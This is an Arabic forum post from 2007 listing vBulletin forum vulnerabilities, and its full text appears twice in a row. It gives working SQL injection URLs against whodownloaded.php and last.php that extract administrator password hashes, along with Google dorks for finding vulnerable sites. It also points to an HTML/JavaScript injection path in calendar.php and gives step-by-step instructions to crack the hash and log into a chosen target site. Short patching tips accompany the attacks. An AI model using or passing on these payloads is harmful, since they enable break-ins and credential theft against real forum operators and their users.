fastgroup
06-25-2007, 12:57 PM
السلام عليكم
هذي مجموعة ثغرات احب انبهكم لها
ثغرة تنزيل الملفات بالتفصـيـل ,,vBulletin,,
الـثغرة : من قام بتحميل هذا الملف ,,
نوع الثغرة : SQL Injection in vBulletin ,,
خـطورة الـثغرة : مرتفعة (( T0p )) ,,
معلومـات الثغرة : مـوجودة فـي احـد هـاكات منتديات vb ,,
الإصدارات المصابة :
جـميع إصدارات الـجيل الثالث لمنتديات الـ vb ,,
>>> vBulletin 3.x.x ,,
################
كود الثـغرة :
whodownloaded.php?attachmentid=-1%20UNION%20SELECT%20password%20FROM%20user%20WHER E%20userid=1ل :
كلمة البحث في قوق
رمز:
inurl:vb/whodownloaded.php
شـرح الثغــرة ,,
http://up3.w6w.net/upload/05-02-2006/w6w_200602052133460850bbdd.jpg
يتبع
ثغره جديده في منتديات vBulletin
من نوع Html_Injection
يعن تقدر تستخدم inject HTML/javascript codes
vBulletin Version 3.5.1
و
vBulletin Version 3.5.2
وهي في التقويم
واشتغلت تمام وهي سهله جداً
وهذا الاستغلال
رمز:
calendar.php?do=addreminder&e=1
ضعه بعد رابط المنتدى
الترقيع غير متوفر الان
لكن الحل القاطع للثغره الأن هو إغلاق خاصية التقويم
يتبع
ثغرة أخر عشر مواضيع vb3 / vb2 (خطير)
الثغرة في : منتديات vBulletin
الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3
ملف الثغرة : أخر عشر مواضيع
طريقة الإختراق :
إذهب إلى أي محرك بحث مثل google.com
وأكتب :
powered by: vbulletin version 3
أو
powered by: vbulletin version 2
إختر أحد المنتديات اللتي ظهرت لك ثم ضع بعد رابط المنتدى مباشرة هذا الكود
last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201/*
بعد المنتدى مباشرة
بحيث يكون
http://www (http://www/).[target].com/vb/last.php?fsel=,user.password%20as%20title,user.%20 username%20as%20lastposter%20FROM%20user,thread%20 %20WHERE%20usergroupid=6%20LIMIT%201/*
مع العلم ان target
هي اسم الموقع المراد أختراقه
مع ملاحظة أن بعض المنتديات اسم ملف أخر المواضيع مختلف عندها مثلاً : ttlast.php / last10.php / last.php
بعد إضافة الكود إضغط إنتر وسوف يظهر لك باسورد المشرف العام في شريط اخر المواضيع
وبعدها يطلع لك الباسوورد المشفر للمنتدى مع المشرف العام
ما عليك الا أستخدام أي برنامج لفك الشفره والدخول الى المنتدى
وبعد فك التشفير ماعليك إلا أن تدخل المنتدى
((طريقة إغلاق الثغرة إفتح ملف أخر عشر مواضيع وابحث عن الدالة $fsel واحذفها فقط))
وان شاء الله اي ثغرات تنزل بنزلها هنا
المصدر ترايدنت
مجنون بس اجنن
هذي مجموعة ثغرات احب انبهكم لها
ثغرة تنزيل الملفات بالتفصـيـل ,,vBulletin,,
الـثغرة : من قام بتحميل هذا الملف ,,
نوع الثغرة : SQL Injection in vBulletin ,,
خـطورة الـثغرة : مرتفعة (( T0p )) ,,
معلومـات الثغرة : مـوجودة فـي احـد هـاكات منتديات vb ,,
الإصدارات المصابة :
جـميع إصدارات الـجيل الثالث لمنتديات الـ vb ,,
>>> vBulletin 3.x.x ,,
################
كود الثـغرة :
whodownloaded.php?attachmentid=-1%20UNION%20SELECT%20password%20FROM%20user%20WHER E%20userid=1ل :
كلمة البحث في قوق
رمز:
inurl:vb/whodownloaded.php
شـرح الثغــرة ,,
http://up3.w6w.net/upload/05-02-2006/w6w_200602052133460850bbdd.jpg
يتبع
ثغره جديده في منتديات vBulletin
من نوع Html_Injection
يعن تقدر تستخدم inject HTML/javascript codes
vBulletin Version 3.5.1
و
vBulletin Version 3.5.2
وهي في التقويم
واشتغلت تمام وهي سهله جداً
وهذا الاستغلال
رمز:
calendar.php?do=addreminder&e=1
ضعه بعد رابط المنتدى
الترقيع غير متوفر الان
لكن الحل القاطع للثغره الأن هو إغلاق خاصية التقويم
يتبع
ثغرة أخر عشر مواضيع vb3 / vb2 (خطير)
الثغرة في : منتديات vBulletin
الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3
ملف الثغرة : أخر عشر مواضيع
طريقة الإختراق :
إذهب إلى أي محرك بحث مثل google.com
وأكتب :
powered by: vbulletin version 3
أو
powered by: vbulletin version 2
إختر أحد المنتديات اللتي ظهرت لك ثم ضع بعد رابط المنتدى مباشرة هذا الكود
last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201/*
بعد المنتدى مباشرة
بحيث يكون
http://www (http://www/).[target].com/vb/last.php?fsel=,user.password%20as%20title,user.%20 username%20as%20lastposter%20FROM%20user,thread%20 %20WHERE%20usergroupid=6%20LIMIT%201/*
مع العلم ان target
هي اسم الموقع المراد أختراقه
مع ملاحظة أن بعض المنتديات اسم ملف أخر المواضيع مختلف عندها مثلاً : ttlast.php / last10.php / last.php
بعد إضافة الكود إضغط إنتر وسوف يظهر لك باسورد المشرف العام في شريط اخر المواضيع
وبعدها يطلع لك الباسوورد المشفر للمنتدى مع المشرف العام
ما عليك الا أستخدام أي برنامج لفك الشفره والدخول الى المنتدى
وبعد فك التشفير ماعليك إلا أن تدخل المنتدى
((طريقة إغلاق الثغرة إفتح ملف أخر عشر مواضيع وابحث عن الدالة $fsel واحذفها فقط))
وان شاء الله اي ثغرات تنزل بنزلها هنا
المصدر ترايدنت
مجنون بس اجنن